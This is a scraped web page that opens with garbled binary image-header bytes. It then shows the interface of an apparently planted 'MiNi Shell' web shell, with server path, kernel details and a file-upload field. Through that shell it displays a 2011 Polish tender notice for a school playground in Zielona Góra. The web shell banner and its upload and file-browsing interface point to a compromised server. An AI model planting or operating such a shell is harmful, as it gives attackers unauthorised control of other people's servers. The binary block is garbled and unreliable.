JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/127990-N-2011.html

<p class="kh_header"><b>Zielona Góra: Zagospodarowanie terenu placu zabaw przy Szkole Podstawowej Nr 15  ul. Lisia   37 w Zielonej Górze w ramach programu rządowego  Radosna szkoła.</b><br>
<b>Numer ogłoszenia: 127990 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 15 im. 4 Dywizji Wojska Polskiego w Zielonej Górze , ul. Lisia 37, 65-098 Zielona Góra, woj. lubuskie, tel. 068 4531777, faks 068 4531778.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp15.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu placu zabaw przy Szkole Podstawowej Nr 15  ul. Lisia   37 w Zielonej Górze w ramach programu rządowego  Radosna szkoła..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    Przedmiotem zamówienia jest zagospodarowanie terenu placu zabaw przy Szkole  
        Podstawowej  Nr   15  ul. Lisia 37 w Zielonej Górze w ramach programu rządowego 
         Radosna szkoła  -   fragment dz. nr 147.  
2.  Przedmiot zamówienia należy wykonać zgodnie z:
2.1. projektem zagospodarowania terenu  stanowiącym załącznik  Nr 11 do niniejszej  SIWZ;
2.2. Specyfikacją Techniczną  stanowiącą załącznik Nr  12  do  niniejszej SIWZ. 
3.   W zakres prac objętych przedmiotem zamówienia wchodzą następujące roboty:
a.      Przygotowanie terenu, roboty ziemne,
b.      Przygotowanie podłoża pod nawierzchnie bezpieczne,
c.      Wykonanie nawierzchni trawiastej,
d.      Montaż nawierzchni bezpiecznej,
e.      Montaż urządzeń zabawowych,
f.       Roboty porządkowe - wywiezienie i utylizacja gruzu i ziemi.
4.  Szczegółowy opis zakresu prac do wykonania zawiera   kosztorys ofertowy  stanowiący załącznik 
      Nr 10   do  niniejszej SIWZ.        
5.  Wszystkie urządzenia zabawowe należy zmontować zgodnie z instrukcją producenta i zgodnie ze 
      sztuką  budowlaną tak aby  każde z nich posiadało wymaganą przepisami strefę bezpieczeństwa. 
      Instrukcja  montażu zostanie  przekazana  Inspektorowi nadzoru w celu umożliwienia sprawdzenia 
     zgodności  montażu.
     Należy zastosować elementy zabawowe zgodne ze wzorem lub równoważne.
     Pod pojęciem równoważny rozumie się element zabawowy odpowiadający pełnionej funkcji, 
     rodzaju  materiałów, bezpieczeństwu użytkowania oraz o minimalnych parametrach technicznych 
     (w stosunku do  wzoru) lub lepszych.
6.  Wszystkie urządzenia przeznaczone do zamontowania na modernizowanym placu zabaw dla 
      dzieci  muszą  spełniać wymogi formalne odpowiednie do wieku użytkowników, posiadać atesty i 
      certyfikaty  wydane przez jednostki certyfikujące, posiadające akredytację Polskiego Centrum 
      Akredytacji, a także  spełniać wymogi norm polskich i UE: PN-EN 1176 z zastosowaniem 
      najaktualniejszych zmian .
7.    Urządzenia muszą być fabrycznie nowe. Dokładne parametry techniczne urządzeń zabawowych 
         zawarte są w  specyfikacji technicznej (załącznik Nr 12 do SIWZ). 
8.    Urządzenia muszą być zabezpieczone przed korozją i wpływami atmosferycznymi  na okres nie 
         mniejszy niż udzielona gwarancja, posiadać wysoką jakość, estetykę, zapewniać 
         bezpieczeństwo i   skuteczność dla korzystających z tych urządzeń dzieci. Elementy z drewna  
        malowane farbami   impregnacyjno-dekoracyjnymi. 
9.    Wszystkie urządzenia musza być oznakowane  zgodnie z wymogami wynikającymi z przepisów 
         bezpieczeństwa , norm EN i PN oraz przepisów Prawa Budowlanego. 
10.   Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową
         obejmuje również:
10.1.organizację, zagospodarowanie i utrzymanie zaplecza budowy, roboty przygotowawcze 
          i porządkowe;
10.2.pełne ubezpieczenie budowy zgodnie z obowiązującymi przepisami prawa;
10.3.zorganizowanie i przeprowadzenie niezbędnych odbiorów;
10.4.ponoszenie kosztów związanych ze zużyciem wody i energii elektrycznej na potrzeby budowy;
10.5.zapewnienie na terenie  budowy należytego ładu i porządku, przestrzeganie przepisów BHP oraz
       utrzymanie  terenu budowy w stanie wolnym od przeszkód komunikacyjnych i wydzielenie stref
       bezpieczeństwa;
10.6.zapewnienie i ponoszenie kosztów związanych z usunięciem oraz składowaniem materiałów
        rozbiórkowych i innych odpadów powstałych w czasie realizacji przedmiotu zamówienia;
10.7.po zakończeniu robót uporządkowanie terenu, w terminie nie późniejszym niż termin odbioru
       przedmiotu zamówienia.
11.  Wyłoniony Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy 
       kopię aktualnej  (opłaconej) polisy ubezpieczenia odpowiedzialności cywilnej w zakresie 
       prowadzonej  działalności gospodarczej  obejmującej okres i wartość  realizacji  zamówienia. 
       W przypadku, gdy  termin obowiązywania polisy będzie się kończył przed terminem zakończenia 
       umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć 
       Zamawiającemu dokument o  kontynuacji ubezpieczenia.
12. Złożenie przez Wykonawcę  oferty oznacza, że dokumentacja projektowa jest kompletna i nadaje 
       się  do  prawidłowego wykonania robót. W związku z powyższym nie może on uchylić  się od 
       odpowiedzialności  za nienależyte wykonanie robót na podstawie dokumentacji projektowej oraz 
        SIWZ.
13. Wykonawca udzieli Zamawiającemu gwarancji na wykonany przedmiot zamówienia na
          okres 36 miesięcy oraz rękojmi za wady robót na okres przekraczający gwarancję 
         o 6 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu Zamówienia nie wymaga 
posiadania    specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnej wiedzy i  doświadczenia Zamawiający uzna wykonanie  w okresie ostatnich pięciu lat przed upływem terminu  składania ofert do udziału w postępowaniu , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej  dwóch zadań w zakresie wykonania lub modernizacji lub zagospodarowania placów zabaw o minimalnej wartości 80.000,00 zł brutto każde  ( oddzielnie dla każdego kontraktu), z podaniem ich rodzaju i wartości, daty  i miejsca wykonania oraz  załączeniem dokumentów potwierdzających,  że te roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. (Zamawiający nie dopuszcza sumowania zadań celem uzyskania wymaganego warunku kwotowego).
Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych  
przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku   dysponowania osobami zdolnymi do wykonania zamówienia, które będą 
uczestniczyć  w wykonywaniu zamówienia  Zamawiający uzna dysponowanie  minimum 1 osobą  , 
posiadającą  zgodnie  z ustawą z dnia 7 lipca 1994r.-Prawo budowlane (  Dz. U. z 2010r. Nr 243, 
poz.1623 -tekst  jednolity )  uprawnienia do kierowania robotami budowlanymi w specjalności  
konstrukcyjno-budowlanej   lub odpowiadające im   ważne  uprawnienia  budowlane wydane na 
podstawie wcześniej obowiązujących przepisów. uprawnienia  budowlane wydane na podstawie 
wcześniej obowiązujących przepisów.         
Sprawdzenie  ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych
przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-     wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
-    oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia,
      której  wykonanie powierzy Podwykonawcom wg załącznika Nr 7 do SIWZ; 
-     wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp w
      załącznika Nr 8 do SIWZ;
-    pisemne zobowiązanie, o którym mowa w pkt  5.2. SIWZ, o ile Wykonawca polega na zasobach 
       innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
-    dokładnie wypełnione kosztorysy ofertowe ( w polskich złotych , z dokładnością do dwóch miejsc
       po przecinku)  wg załącznika Nr 10 do SIWZ;
-      zaakceptowany projekty umowy wg załącznika Nr 9  do SIWZ ;
-  pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania    
       Wykonawcy, o   ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dopuszczalne w zakresie przewidzianym w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp15.bipzielonagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego w sekretariacie szkoły  osobiście po okazaniu dowodu wniesienia opłaty w wysokości 29,60 zł, pocztą 35,10 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 09:00, miejsce: siedziba Zamawiającego, Szkoła Podstawowa Nr 15, sekretariat, szkoły, ul. Lisia 37, 65-098 Zielona Góra..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com